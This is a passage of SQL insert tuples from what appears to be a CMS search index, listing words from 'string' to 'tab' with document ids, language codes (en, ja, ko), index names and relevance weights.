('string', 71, 'ja', 'help_search', 4),
('string', 71, 'ko', 'help_search', 4),
('strings', 44, 'en', 'help_search', 1),
('strings', 44, 'ja', 'help_search', 1),
('strings', 44, 'ko', 'help_search', 1),
('strings', 52, 'en', 'help_search', 2),
('strings', 52, 'ja', 'help_search', 2),
('strings', 52, 'ko', 'help_search', 2),
('strings', 71, 'en', 'help_search', 1),
('strings', 71, 'ja', 'help_search', 1),
('strings', 71, 'ko', 'help_search', 1),
('strings', 86, 'en', 'help_search', 1),
('strings', 86, 'ja', 'help_search', 1),
('strings', 86, 'ko', 'help_search', 1),
('strives', 135, 'en', 'node_search', 1),
('striving', 23, 'en', 'node_search', 0.774192),
('strong', 160, 'en', 'node_search', 1),
('strong', 162, 'en', 'node_search', 0.923838),
('strong', 170, 'en', 'node_search', 1),
('strong', 181, 'en', 'node_search', 1),
('strong', 182, 'en', 'node_search', 1),
('strong', 186, 'en', 'node_search', 1),
('strong', 189, 'en', 'node_search', 1),
('strong', 198, 'en', 'node_search', 1),
('structure', 1, 'en', 'help_search', 4),
('structure', 1, 'ja', 'help_search', 4),
('structure', 1, 'ko', 'help_search', 4),
('structure', 3, 'en', 'help_search', 4),
('structure', 3, 'ja', 'help_search', 4),
('structure', 3, 'ko', 'help_search', 4),
('structure', 5, 'en', 'help_search', 4),
('structure', 5, 'ja', 'help_search', 4),
('structure', 5, 'ko', 'help_search', 4),
('structure', 7, 'en', 'help_search', 1),
('structure', 7, 'ja', 'help_search', 1),
('structure', 7, 'ko', 'help_search', 1),
('structure', 8, 'en', 'help_search', 5),
('structure', 8, 'ja', 'help_search', 5),
('structure', 8, 'ko', 'help_search', 5),
('structure', 9, 'en', 'help_search', 1),
('structure', 9, 'ja', 'help_search', 1),
('structure', 9, 'ko', 'help_search', 1),
('structure', 11, 'en', 'help_search', 1),
('structure', 11, 'ja', 'help_search', 1),
('structure', 11, 'ko', 'help_search', 1),
('structure', 17, 'en', 'help_search', 4),
('structure', 17, 'ja', 'help_search', 4),
('structure', 17, 'ko', 'help_search', 4),
('structure', 19, 'en', 'help_search', 4),
('structure', 19, 'ja', 'help_search', 4),
('structure', 19, 'ko', 'help_search', 4),
('structure', 21, 'en', 'help_search', 4),
('structure', 21, 'ja', 'help_search', 4),
('structure', 21, 'ko', 'help_search', 4),
('structure', 24, 'en', 'help_search', 6),
('structure', 24, 'ja', 'help_search', 6),
('structure', 24, 'ko', 'help_search', 6),
('structure', 25, 'en', 'help_search', 5),
('structure', 25, 'ja', 'help_search', 5),
('structure', 26, 'en', 'help_search', 5),
('structure', 26, 'ja', 'help_search', 5),
('structure', 26, 'ko', 'help_search', 5),
('structure', 27, 'en', 'help_search', 5),
('structure', 27, 'ja', 'help_search', 5),
('structure', 27, 'ko', 'help_search', 5),
('structure', 29, 'en', 'help_search', 1),
('structure', 29, 'ja', 'help_search', 1),
('structure', 29, 'ko', 'help_search', 1),
('structure', 30, 'en', 'help_search', 2),
('structure', 30, 'ja', 'help_search', 2),
('structure', 30, 'ko', 'help_search', 2),
('structure', 31, 'ja', 'help_search', 39.205),
('structure', 35, 'en', 'help_search', 1),
('structure', 35, 'ja', 'help_search', 1),
('structure', 35, 'ko', 'help_search', 1),
('structure', 41, 'en', 'help_search', 1),
('structure', 41, 'ja', 'help_search', 1),
('structure', 41, 'ko', 'help_search', 1),
('structure', 43, 'en', 'help_search', 4),
('structure', 43, 'ja', 'help_search', 4),
('structure', 43, 'ko', 'help_search', 4),
('structure', 44, 'en', 'help_search', 1),
('structure', 44, 'ja', 'help_search', 1),
('structure', 44, 'ko', 'help_search', 1),
('structure', 45, 'en', 'help_search', 4),
('structure', 45, 'ja', 'help_search', 4),
('structure', 45, 'ko', 'help_search', 4),
('structure', 54, 'en', 'help_search', 5),
('structure', 54, 'ja', 'help_search', 5),
('structure', 54, 'ko', 'help_search', 5),
('structure', 55, 'en', 'help_search', 5),
('structure', 55, 'ja', 'help_search', 5),
('structure', 55, 'ko', 'help_search', 5),
('structure', 56, 'en', 'help_search', 8),
('structure', 56, 'ja', 'help_search', 8),
('structure', 56, 'ko', 'help_search', 8),
('structure', 57, 'en', 'help_search', 4),
('structure', 57, 'ja', 'help_search', 4),
('structure', 57, 'ko', 'help_search', 4),
('structure', 58, 'en', 'help_search', 4),
('structure', 58, 'ja', 'help_search', 4),
('structure', 58, 'ko', 'help_search', 4),
('structure', 59, 'en', 'help_search', 1),
('structure', 59, 'ja', 'help_search', 1),
('structure', 59, 'ko', 'help_search', 1),
('structure', 60, 'en', 'help_search', 15),
('structure', 60, 'ja', 'help_search', 15),
('structure', 60, 'ko', 'help_search', 15),
('structure', 61, 'en', 'help_search', 1),
('structure', 61, 'ja', 'help_search', 1),
('structure', 61, 'ko', 'help_search', 1),
('structure', 62, 'en', 'help_search', 2),
('structure', 62, 'ja', 'help_search', 2),
('structure', 62, 'ko', 'help_search', 2),
('structure', 79, 'en', 'help_search', 5),
('structure', 79, 'ja', 'help_search', 5),
('structure', 79, 'ko', 'help_search', 5),
('structure', 80, 'en', 'help_search', 2),
('structure', 80, 'ja', 'help_search', 2),
('structure', 80, 'ko', 'help_search', 2),
('structure', 88, 'en', 'help_search', 4),
('structure', 88, 'ja', 'help_search', 4),
('structure', 88, 'ko', 'help_search', 4),
('structure', 89, 'en', 'help_search', 4),
('structure', 89, 'ja', 'help_search', 4),
('structure', 89, 'ko', 'help_search', 4),
('structure', 90, 'en', 'help_search', 4),
('structure', 90, 'ja', 'help_search', 4),
('structure', 90, 'ko', 'help_search', 4),
('structure', 91, 'en', 'help_search', 4),
('structure', 91, 'ja', 'help_search', 4),
('structure', 91, 'ko', 'help_search', 4),
('structure', 92, 'en', 'help_search', 1),
('structure', 92, 'ja', 'help_search', 1),
('structure', 92, 'ko', 'help_search', 1),
('structured', 133, 'en', 'node_search', 1),
('structures', 44, 'en', 'help_search', 1),
('structures', 44, 'ja', 'help_search', 1),
('structures', 44, 'ko', 'help_search', 1),
('student', 62, 'en', 'node_search', 1),
('student', 120, 'en', 'node_search', 49),
('student', 120, 'ja', 'node_search', 27),
('student', 181, 'en', 'node_search', 27),
('students', 20, 'en', 'node_search', 28),
('students', 20, 'ko', 'node_search', 28),
('students', 95, 'en', 'node_search', 1),
('students', 98, 'en', 'node_search', 1),
('students', 133, 'en', 'node_search', 1),
('students', 135, 'en', 'node_search', 2),
('students', 136, 'en', 'node_search', 5),
('students', 140, 'en', 'node_search', 46),
('students', 140, 'ja', 'node_search', 27),
('students', 142, 'en', 'node_search', 2),
('students', 155, 'en', 'node_search', 1),
('studentsopportunities', 135, 'en', 'node_search', 1),
('studentswith', 133, 'en', 'node_search', 1),
('studies', 173, 'en', 'node_search', 1),
('studies', 181, 'en', 'node_search', 3),
('studies', 182, 'en', 'node_search', 1),
('studies', 183, 'en', 'node_search', 5),
('study', 98, 'en', 'node_search', 1),
('study', 142, 'en', 'node_search', 1),
('studying', 182, 'en', 'node_search', 4),
('style', 30, 'en', 'help_search', 1),
('style', 30, 'ja', 'help_search', 1),
('style', 30, 'ko', 'help_search', 1),
('style', 35, 'en', 'help_search', 20),
('style', 35, 'ja', 'help_search', 20),
('style', 35, 'ko', 'help_search', 20),
('style', 48, 'en', 'help_search', 41),
('style', 48, 'ja', 'help_search', 41),
('style', 48, 'ko', 'help_search', 41),
('style', 93, 'en', 'help_search', 1),
('style', 93, 'ja', 'help_search', 1),
('style', 93, 'ko', 'help_search', 1),
('style', 120, 'en', 'node_search', 1),
('styles', 30, 'en', 'help_search', 1),
('styles', 30, 'ja', 'help_search', 1),
('styles', 30, 'ko', 'help_search', 1),
('styles', 35, 'en', 'help_search', 4.97954),
('styles', 35, 'ja', 'help_search', 4.97954),
('styles', 35, 'ko', 'help_search', 4.97954),
('styles', 48, 'en', 'help_search', 2),
('styles', 48, 'ja', 'help_search', 2),
('styles', 48, 'ko', 'help_search', 2),
('styling', 29, 'en', 'help_search', 1),
('styling', 29, 'ja', 'help_search', 1),
('styling', 29, 'ko', 'help_search', 1),
('subdirectory', 46, 'en', 'help_search', 1),
('subdirectory', 46, 'ja', 'help_search', 1),
('subdirectory', 46, 'ko', 'help_search', 1),
('subject', 17, 'en', 'help_search', 4),
('subject', 17, 'ja', 'help_search', 4),
('subject', 17, 'ko', 'help_search', 4),
('subject', 18, 'en', 'help_search', 4),
('subject', 18, 'ja', 'help_search', 4),
('subject', 18, 'ko', 'help_search', 4),
('subject', 19, 'en', 'help_search', 4),
('subject', 19, 'ja', 'help_search', 4),
('subject', 19, 'ko', 'help_search', 4),
('subject', 31, 'en', 'node_search', 1),
('submission', 7, 'en', 'help_search', 0.961087),
('submission', 7, 'ja', 'help_search', 0.961087),
('submission', 7, 'ko', 'help_search', 0.961087),
('submit', 39, 'en', 'help_search', 1),
('submit', 39, 'ja', 'help_search', 1),
('submit', 39, 'ko', 'help_search', 1),
('submit', 42, 'en', 'help_search', 1),
('submit', 42, 'ja', 'help_search', 1),
('submit', 42, 'ko', 'help_search', 1),
('submitting', 11, 'en', 'help_search', 0.938382),
('submitting', 11, 'ja', 'help_search', 0.938382),
('submitting', 11, 'ko', 'help_search', 0.938382),
('subset', 31, 'ja', 'help_search', 1),
('substituted', 86, 'en', 'help_search', 1),
('substituted', 86, 'ja', 'help_search', 1),
('substituted', 86, 'ko', 'help_search', 1),
('subterm', 80, 'en', 'help_search', 1),
('subterm', 80, 'ja', 'help_search', 1),
('subterm', 80, 'ko', 'help_search', 1),
('subtype', 7, 'en', 'help_search', 8.90974),
('subtype', 7, 'ja', 'help_search', 8.90974),
('subtype', 7, 'ko', 'help_search', 8.90974),
('subtype', 9, 'en', 'help_search', 1),
('subtype', 9, 'ja', 'help_search', 1),
('subtype', 9, 'ko', 'help_search', 1),
('subtype', 24, 'en', 'help_search', 29),
('subtype', 24, 'ja', 'help_search', 29),
('subtype', 24, 'ko', 'help_search', 29),
('subtype', 25, 'en', 'help_search', 29),
('subtype', 25, 'ja', 'help_search', 29),
('subtype', 26, 'en', 'help_search', 29),
('subtype', 26, 'ja', 'help_search', 29),
('subtype', 26, 'ko', 'help_search', 29),
('subtype', 27, 'en', 'help_search', 29),
('subtype', 27, 'ja', 'help_search', 29),
('subtype', 27, 'ko', 'help_search', 29),
('subtype', 31, 'ja', 'help_search', 0.980874),
('subtype', 54, 'en', 'help_search', 1),
('subtype', 54, 'ja', 'help_search', 1),
('subtype', 54, 'ko', 'help_search', 1),
('subtype', 79, 'en', 'help_search', 4),
('subtype', 79, 'ja', 'help_search', 4),
('subtype', 79, 'ko', 'help_search', 4),
('subtype', 92, 'en', 'help_search', 4),
('subtype', 92, 'ja', 'help_search', 4),
('subtype', 92, 'ko', 'help_search', 4),
('subtypes', 11, 'en', 'help_search', 1),
('subtypes', 11, 'ja', 'help_search', 1),
('subtypes', 11, 'ko', 'help_search', 1),
('subtypes', 24, 'en', 'help_search', 1),
('subtypes', 24, 'ja', 'help_search', 1),
('subtypes', 24, 'ko', 'help_search', 1),
('subtypes', 27, 'en', 'help_search', 1),
('subtypes', 27, 'ja', 'help_search', 1),
('subtypes', 27, 'ko', 'help_search', 1),
('subtypes', 29, 'en', 'help_search', 1),
('subtypes', 29, 'ja', 'help_search', 1),
('subtypes', 29, 'ko', 'help_search', 1),
('subtypes', 31, 'ja', 'help_search', 6.98902),
('subtypes', 35, 'en', 'help_search', 1),
('subtypes', 35, 'ja', 'help_search', 1),
('subtypes', 35, 'ko', 'help_search', 1),
('subtypes', 62, 'en', 'help_search', 1),
('subtypes', 62, 'ja', 'help_search', 1),
('subtypes', 62, 'ko', 'help_search', 1),
('subtypes', 80, 'en', 'help_search', 1),
('subtypes', 80, 'ja', 'help_search', 1),
('subtypes', 80, 'ko', 'help_search', 1),
('subtypes', 92, 'en', 'help_search', 1),
('subtypes', 92, 'ja', 'help_search', 1),
('subtypes', 92, 'ko', 'help_search', 1),
('success', 62, 'en', 'node_search', 0.808176),
('success', 80, 'en', 'node_search', 1),
('success', 113, 'en', 'node_search', 1),
('success', 126, 'en', 'node_search', 1),
('success', 136, 'en', 'node_search', 1),
('success', 140, 'en', 'node_search', 2),
('success', 154, 'en', 'node_search', 1),
('success', 156, 'en', 'node_search', 1),
('success', 157, 'en', 'node_search', 1),
('success', 160, 'en', 'node_search', 2),
('success', 161, 'en', 'node_search', 5),
('success', 165, 'en', 'node_search', 1),
('success', 166, 'en', 'node_search', 5),
('success', 167, 'en', 'node_search', 1),
('success', 168, 'en', 'node_search', 5),
('success', 169, 'en', 'node_search', 1),
('success', 170, 'en', 'node_search', 2),
('success', 171, 'en', 'node_search', 1),
('success', 174, 'en', 'node_search', 1),
('success', 175, 'en', 'node_search', 1),
('success', 176, 'en', 'node_search', 1),
('success', 177, 'en', 'node_search', 1),
('success', 178, 'en', 'node_search', 5),
('success', 179, 'en', 'node_search', 5),
('success', 180, 'en', 'node_search', 28),
('success', 181, 'en', 'node_search', 5),
('success', 182, 'en', 'node_search', 4),
('success', 183, 'en', 'node_search', 29),
('success', 184, 'en', 'node_search', 1),
('success', 185, 'en', 'node_search', 5),
('success', 186, 'en', 'node_search', 6),
('success', 187, 'en', 'node_search', 32),
('success', 188, 'en', 'node_search', 5),
('success', 189, 'en', 'node_search', 32),
('success', 190, 'en', 'node_search', 32),
('success', 191, 'en', 'node_search', 33),
('success', 192, 'en', 'node_search', 32),
('success', 193, 'en', 'node_search', 32),
('success', 194, 'en', 'node_search', 5),
('success', 195, 'en', 'node_search', 32),
('success', 196, 'en', 'node_search', 32),
('success', 197, 'en', 'node_search', 32),
('success', 198, 'en', 'node_search', 6),
('success', 199, 'en', 'node_search', 32),
('successful', 133, 'en', 'node_search', 1),
('successful', 138, 'en', 'node_search', 1),
('successful', 164, 'en', 'node_search', 1),
('successful', 168, 'en', 'node_search', 1),
('successful', 173, 'en', 'node_search', 2),
('successful', 174, 'en', 'node_search', 1),
('successful', 175, 'en', 'node_search', 1),
('successful', 178, 'en', 'node_search', 27),
('successful', 179, 'en', 'node_search', 28),
('successful', 180, 'en', 'node_search', 4),
('successful', 182, 'en', 'node_search', 28),
('successful', 187, 'en', 'node_search', 1),
('successful', 188, 'en', 'node_search', 27),
('successful', 190, 'en', 'node_search', 1),
('successful', 191, 'en', 'node_search', 2),
('successful', 193, 'en', 'node_search', 1),
('successful', 194, 'en', 'node_search', 27),
('successful', 196, 'en', 'node_search', 1),
('successful', 197, 'en', 'node_search', 1),
('successfully', 23, 'en', 'node_search', 1),
('successfully', 67, 'ja', 'node_search', 1),
('successfully', 133, 'en', 'node_search', 1),
('successfully', 136, 'en', 'node_search', 1),
('successfully', 140, 'en', 'node_search', 1),
('successfully', 154, 'en', 'node_search', 2),
('successfully', 156, 'en', 'node_search', 1),
('successfully', 157, 'en', 'node_search', 1),
('successfully', 160, 'en', 'node_search', 32),
('successfully', 161, 'en', 'node_search', 32),
('successfully', 164, 'en', 'node_search', 2),
('successfully', 165, 'en', 'node_search', 2),
('successfully', 166, 'en', 'node_search', 32),
('successfully', 167, 'en', 'node_search', 2),
('successfully', 168, 'en', 'node_search', 29),
('successfully', 169, 'en', 'node_search', 5),
('successfully', 170, 'en', 'node_search', 32),
('successfully', 171, 'en', 'node_search', 5),
('successfully', 173, 'en', 'node_search', 1),
('successfully', 174, 'en', 'node_search', 2),
('successfully', 175, 'en', 'node_search', 2),
('successfully', 176, 'en', 'node_search', 2),
('successfully', 177, 'en', 'node_search', 2),
('successfully', 178, 'en', 'node_search', 2),
('successfully', 179, 'en', 'node_search', 2),
('successfully', 180, 'en', 'node_search', 2),
('successfully', 181, 'en', 'node_search', 29),
('successfully', 182, 'en', 'node_search', 5),
('successfully', 183, 'en', 'node_search', 5),
('successfully', 184, 'en', 'node_search', 1),
('successfully', 185, 'en', 'node_search', 30),
('successfully', 186, 'en', 'node_search', 2),
('successfully', 187, 'en', 'node_search', 5),
('successfully', 188, 'en', 'node_search', 3),
('successfully', 189, 'en', 'node_search', 6),
('successfully', 190, 'en', 'node_search', 5),
('successfully', 191, 'en', 'node_search', 4),
('successfully', 192, 'en', 'node_search', 3),
('successfully', 193, 'en', 'node_search', 6),
('successfully', 194, 'en', 'node_search', 6),
('successfully', 195, 'en', 'node_search', 2),
('successfully', 196, 'en', 'node_search', 6),
('successfully', 197, 'en', 'node_search', 6),
('successfully', 198, 'en', 'node_search', 2),
('successfully', 199, 'en', 'node_search', 6),
('such', 6, 'en', 'help_search', 1.98902),
('such', 6, 'ja', 'help_search', 1.98902),
('such', 6, 'ko', 'help_search', 1.98902),
('such', 11, 'en', 'help_search', 0.961087),
('such', 11, 'ja', 'help_search', 0.961087),
('such', 11, 'ko', 'help_search', 0.961087),
('such', 14, 'en', 'help_search', 1),
('such', 14, 'ja', 'help_search', 1),
('such', 14, 'ko', 'help_search', 1),
('such', 15, 'en', 'help_search', 1),
('such', 15, 'ja', 'help_search', 1),
('such', 15, 'ko', 'help_search', 1),
('such', 17, 'en', 'help_search', 1),
('such', 17, 'ja', 'help_search', 1),
('such', 17, 'ko', 'help_search', 1),
('such', 22, 'en', 'help_search', 1),
('such', 22, 'ja', 'help_search', 1),
('such', 22, 'ko', 'help_search', 1),
('such', 23, 'en', 'help_search', 1),
('such', 23, 'en', 'node_search', 1.89272),
('such', 23, 'ja', 'help_search', 1),
('such', 23, 'ko', 'help_search', 1),
('such', 24, 'en', 'node_search', 1.76921),
('such', 27, 'en', 'node_search', 0.781775),
('such', 28, 'en', 'help_search', 2),
('such', 28, 'ja', 'help_search', 2),
('such', 28, 'ko', 'help_search', 2),
('such', 30, 'en', 'help_search', 2.73841),
('such', 30, 'ja', 'help_search', 2.73841),
('such', 30, 'ko', 'help_search', 2.73841),
('such', 31, 'ja', 'help_search', 4.6522),
('such', 32, 'en', 'help_search', 1),
('such', 32, 'ja', 'help_search', 1),
('such', 32, 'ko', 'help_search', 1),
('such', 34, 'en', 'help_search', 1),
('such', 34, 'ja', 'help_search', 1),
('such', 34, 'ko', 'help_search', 1),
('such', 35, 'en', 'help_search', 1),
('such', 35, 'ja', 'help_search', 1),
('such', 35, 'ko', 'help_search', 1),
('such', 37, 'en', 'help_search', 1),
('such', 37, 'ja', 'help_search', 1),
('such', 37, 'ko', 'help_search', 1),
('such', 42, 'en', 'help_search', 1),
('such', 42, 'ja', 'help_search', 1),
('such', 42, 'ko', 'help_search', 1),
('such', 43, 'en', 'help_search', 1),
('such', 43, 'ja', 'help_search', 1),
('such', 43, 'ko', 'help_search', 1),
('such', 44, 'en', 'help_search', 2),
('such', 44, 'ja', 'help_search', 2),
('such', 44, 'ko', 'help_search', 2),
('such', 45, 'en', 'help_search', 1),
('such', 45, 'ja', 'help_search', 1),
('such', 45, 'ko', 'help_search', 1),
('such', 56, 'en', 'help_search', 1),
('such', 56, 'ja', 'help_search', 1),
('such', 56, 'ko', 'help_search', 1),
('such', 68, 'en', 'help_search', 0.989021),
('such', 68, 'ja', 'help_search', 0.989021),
('such', 68, 'ko', 'help_search', 0.989021),
('such', 72, 'en', 'help_search', 1),
('such', 72, 'ja', 'help_search', 1),
('such', 72, 'ko', 'help_search', 1),
('such', 80, 'en', 'help_search', 1),
('such', 80, 'ja', 'help_search', 1),
('such', 80, 'ko', 'help_search', 1),
('such', 81, 'en', 'help_search', 1),
('such', 81, 'ja', 'help_search', 1),
('such', 81, 'ko', 'help_search', 1),
('such', 84, 'en', 'help_search', 2),
('such', 84, 'ja', 'help_search', 2),
('such', 84, 'ko', 'help_search', 2),
('such', 91, 'en', 'help_search', 3),
('such', 91, 'ja', 'help_search', 3),
('such', 91, 'ko', 'help_search', 3),
('such', 93, 'en', 'help_search', 4.78568),
('such', 93, 'ja', 'help_search', 4.78568),
('such', 93, 'ko', 'help_search', 4.78568),
('such', 133, 'en', 'node_search', 1),
('sufficient', 93, 'en', 'help_search', 0.854391),
('sufficient', 93, 'ja', 'help_search', 0.854391),
('sufficient', 93, 'ko', 'help_search', 0.854391),
('suggested', 13, 'en', 'help_search', 1),
('suggested', 13, 'ja', 'help_search', 1),
('suggested', 13, 'ko', 'help_search', 1),
('summarizes', 76, 'en', 'help_search', 1),
('summarizes', 76, 'ja', 'help_search', 1),
('summarizes', 76, 'ko', 'help_search', 1),
('summary', 42, 'en', 'help_search', 1),
('summary', 42, 'ja', 'help_search', 1),
('summary', 42, 'ko', 'help_search', 1),
('summary', 57, 'en', 'help_search', 1),
('summary', 57, 'ja', 'help_search', 1),
('summary', 57, 'ko', 'help_search', 1),
('sun', 30, 'en', 'node_search', 1),
('sun', 30, 'ja', 'node_search', 1),
('sun', 30, 'ko', 'node_search', 1),
('sun', 73, 'en', 'node_search', 1),
('sun', 73, 'ja', 'node_search', 1),
('sun', 76, 'en', 'node_search', 1),
('sun', 76, 'ja', 'node_search', 1),
('sun', 79, 'en', 'node_search', 1),
('sun', 80, 'en', 'node_search', 1),
('sun', 80, 'ja', 'node_search', 1),
('sun', 103, 'en', 'node_search', 1),
('sun', 103, 'ja', 'node_search', 1),
('sun', 111, 'en', 'node_search', 1),
('sun', 111, 'ja', 'node_search', 1),
('sun', 114, 'en', 'node_search', 1),
('sun', 114, 'ja', 'node_search', 1),
('sun', 120, 'en', 'node_search', 1),
('sun', 120, 'ja', 'node_search', 1),
('sun', 150, 'en', 'node_search', 1),
('sun', 150, 'ja', 'node_search', 1),
('sun', 154, 'en', 'node_search', 1),
('sun', 154, 'ja', 'node_search', 1),
('sun', 155, 'en', 'node_search', 1),
('sun', 155, 'ja', 'node_search', 1),
('sun', 157, 'en', 'node_search', 1),
('sun', 157, 'ja', 'node_search', 1),
('sun', 169, 'en', 'node_search', 1),
('sun', 169, 'ja', 'node_search', 1),
('sun', 171, 'en', 'node_search', 1),
('sun', 171, 'ja', 'node_search', 1),
('sun', 175, 'en', 'node_search', 1),
('sun', 175, 'ja', 'node_search', 1),
('sunday', 142, 'en', 'node_search', 1),
('supervisors', 27, 'en', 'node_search', 0.968904),
('supplied', 29, 'en', 'help_search', 1),
('supplied', 29, 'ja', 'help_search', 1),
('supplied', 29, 'ko', 'help_search', 1),
('support', 23, 'en', 'node_search', 0.779231),
('support', 24, 'en', 'node_search', 0.993146),
('support', 30, 'en', 'node_search', 1),
('support', 67, 'en', 'help_search', 0.976851),
('support', 67, 'ja', 'help_search', 0.976851),
('support', 67, 'ko', 'help_search', 0.976851),
('support', 80, 'en', 'node_search', 1),
('support', 93, 'en', 'help_search', 1.82206),
('support', 93, 'ja', 'help_search', 1.82206),
('support', 93, 'ko', 'help_search', 1.82206),
('support', 138, 'en', 'node_search', 1),
('support', 154, 'en', 'node_search', 2),
('support', 162, 'en', 'node_search', 3),
('support', 165, 'en', 'node_search', 1),
('support', 173, 'en', 'node_search', 1),
('support', 188, 'en', 'node_search', 1),
('support', 189, 'en', 'node_search', 1),
('supporting', 161, 'en', 'node_search', 1),
('supporting', 164, 'en', 'node_search', 1),
('supporting', 167, 'en', 'node_search', 1),
('supporting', 170, 'en', 'node_search', 1),
('supporting', 174, 'en', 'node_search', 1),
('supporting', 175, 'en', 'node_search', 1),
('supporting', 179, 'en', 'node_search', 1),
('supporting', 186, 'en', 'node_search', 1),
('supporting', 188, 'en', 'node_search', 1),
('supportive', 135, 'en', 'node_search', 1),
('supports', 5, 'en', 'node_search', 1),
('supports', 5, 'ko', 'node_search', 1),
('supports', 68, 'en', 'help_search', 1),
('supports', 68, 'ja', 'help_search', 1),
('supports', 68, 'ko', 'help_search', 1),
('sure', 22, 'en', 'help_search', 2),
('sure', 22, 'ja', 'help_search', 2),
('sure', 22, 'ko', 'help_search', 2),
('sure', 23, 'en', 'help_search', 0.836446),
('sure', 23, 'en', 'node_search', 0.839384),
('sure', 23, 'ja', 'help_search', 0.836446),
('sure', 23, 'ko', 'help_search', 0.836446),
('sure', 32, 'en', 'help_search', 1),
('sure', 32, 'ja', 'help_search', 1),
('sure', 32, 'ko', 'help_search', 1),
('sure', 52, 'en', 'help_search', 1),
('sure', 52, 'ja', 'help_search', 1),
('sure', 52, 'ko', 'help_search', 1),
('sure', 56, 'en', 'help_search', 1),
('sure', 56, 'ja', 'help_search', 1),
('sure', 56, 'ko', 'help_search', 1),
('sure', 63, 'en', 'help_search', 1),
('sure', 63, 'ja', 'help_search', 1),
('sure', 63, 'ko', 'help_search', 1),
('sure', 66, 'en', 'help_search', 1),
('sure', 66, 'ja', 'help_search', 1),
('sure', 67, 'en', 'help_search', 2.91323),
('sure', 67, 'ja', 'help_search', 2.91323),
('sure', 67, 'ko', 'help_search', 2.91323),
('sure', 68, 'en', 'help_search', 0.833529),
('sure', 68, 'ja', 'help_search', 0.833529),
('sure', 68, 'ko', 'help_search', 0.833529),
('sure', 69, 'en', 'help_search', 2),
('sure', 69, 'ja', 'help_search', 2),
('sure', 69, 'ko', 'help_search', 2),
('sure', 81, 'en', 'help_search', 2),
('sure', 81, 'ja', 'help_search', 2),
('sure', 81, 'ko', 'help_search', 2),
('surrounded', 24, 'en', 'node_search', 0.729424),
('surrounding', 122, 'en', 'node_search', 1),
('survived', 204, 'en', 'node_search', 4),
('survived', 204, 'ja', 'node_search', 4),
('sushi', 122, 'en', 'node_search', 47),
('sushi', 122, 'ja', 'node_search', 27),
('swe', 78, 'en', 'node_search', 2),
('swe', 78, 'ja', 'node_search', 2),
('switch', 29, 'en', 'help_search', 0.989021),
('switch', 29, 'ja', 'help_search', 0.989021),
('switch', 29, 'ko', 'help_search', 0.989021),
('switch', 43, 'en', 'help_search', 0.953396),
('switch', 43, 'ja', 'help_search', 0.953396),
('switch', 43, 'ko', 'help_search', 0.953396),
('switch', 91, 'en', 'help_search', 1),
('switch', 91, 'ja', 'help_search', 1),
('switch', 91, 'ko', 'help_search', 1),
('switcher', 41, 'en', 'help_search', 4),
('switcher', 41, 'ja', 'help_search', 4),
('switcher', 41, 'ko', 'help_search', 4),
('switcher', 50, 'en', 'help_search', 4),
('switcher', 50, 'ja', 'help_search', 4),
('switcher', 50, 'ko', 'help_search', 4),
('syn', 157, 'en', 'node_search', 1),
('syn', 157, 'ja', 'node_search', 1),
('sync', 30, 'en', 'help_search', 4.53866),
('sync', 30, 'ja', 'help_search', 4.53866),
('sync', 30, 'ko', 'help_search', 4.53866),
('synchronization', 12, 'en', 'help_search', 4),
('synchronization', 12, 'ja', 'help_search', 4),
('synchronization', 12, 'ko', 'help_search', 4),
('synchronization', 13, 'en', 'help_search', 4),
('synchronization', 13, 'ja', 'help_search', 4),
('synchronization', 13, 'ko', 'help_search', 4),
('synchronization', 14, 'en', 'help_search', 5),
('synchronization', 14, 'ja', 'help_search', 5),
('synchronization', 14, 'ko', 'help_search', 5),
('synchronization', 15, 'en', 'help_search', 4),
('synchronization', 15, 'ja', 'help_search', 4),
('synchronization', 15, 'ko', 'help_search', 4),
('synchronization', 30, 'en', 'help_search', 22.3776),
('synchronization', 30, 'ja', 'help_search', 22.3776),
('synchronization', 30, 'ko', 'help_search', 22.3776),
('synchronize', 14, 'en', 'help_search', 4),
('synchronize', 14, 'ja', 'help_search', 4),
('synchronize', 14, 'ko', 'help_search', 4),
('synchronize', 30, 'en', 'help_search', 1),
('synchronize', 30, 'ja', 'help_search', 1),
('synchronize', 30, 'ko', 'help_search', 1),
('synchronized', 30, 'en', 'help_search', 0.902857),
('synchronized', 30, 'ja', 'help_search', 0.902857),
('synchronized', 30, 'ko', 'help_search', 0.902857),
('synchronizing', 30, 'en', 'help_search', 0.738408),
('synchronizing', 30, 'ja', 'help_search', 0.738408),
('synchronizing', 30, 'ko', 'help_search', 0.738408),
('syslog', 34, 'en', 'help_search', 1),
('syslog', 34, 'ja', 'help_search', 1),
('syslog', 34, 'ko', 'help_search', 1),
('system', 22, 'en', 'help_search', 1),
('system', 22, 'ja', 'help_search', 1),
('system', 22, 'ko', 'help_search', 1),
('system', 24, 'en', 'node_search', 0.830633),
('system', 24, 'ja', 'node_search', 0.482016),
('system', 24, 'ko', 'node_search', 0.848323),
('system', 26, 'en', 'node_search', 1),
('system', 26, 'ja', 'node_search', 1),
('system', 30, 'en', 'help_search', 21.6358),
('system', 30, 'ja', 'help_search', 21.6358),
('system', 30, 'ko', 'help_search', 21.6358),
('system', 31, 'ja', 'help_search', 4.4446),
('system', 32, 'en', 'help_search', 5),
('system', 32, 'ja', 'help_search', 5),
('system', 32, 'ko', 'help_search', 5),
('system', 35, 'en', 'help_search', 1),
('system', 35, 'ja', 'help_search', 1),
('system', 35, 'ko', 'help_search', 1),
('system', 36, 'en', 'help_search', 1),
('system', 36, 'ja', 'help_search', 1),
('system', 36, 'ko', 'help_search', 1),
('system', 43, 'en', 'help_search', 1),
('system', 43, 'ja', 'help_search', 1),
('system', 43, 'ko', 'help_search', 1),
('system', 49, 'en', 'help_search', 1),
('system', 49, 'ja', 'help_search', 1),
('system', 49, 'ko', 'help_search', 1),
('system', 68, 'en', 'help_search', 1),
('system', 68, 'ja', 'help_search', 1),
('system', 68, 'ko', 'help_search', 1),
('system', 71, 'en', 'help_search', 4),
('system', 71, 'ja', 'help_search', 4),
('system', 71, 'ko', 'help_search', 4),
('system', 72, 'en', 'help_search', 4),
('system', 72, 'ja', 'help_search', 4),
('system', 72, 'ko', 'help_search', 4),
('systematic', 66, 'en', 'node_search', 1),
('systems', 37, 'en', 'help_search', 1),
('systems', 37, 'ja', 'help_search', 1),
('systems', 37, 'ko', 'help_search', 1),
('tab', 4, 'en', 'help_search', 1),
('tab', 4, 'ja', 'help_search', 1),
('tab', 4, 'ko', 'help_search', 1),
('tab', 10, 'en', 'help_search', 1),
('tab', 10, 'ja', 'help_search', 1),
('tab', 10, 'ko', 'help_search', 1),
('tab', 20, 'en', 'help_search', 1),
('tab', 20, 'ja', 'help_search', 1),
('tab', 20, 'ko', 'help_search', 1),
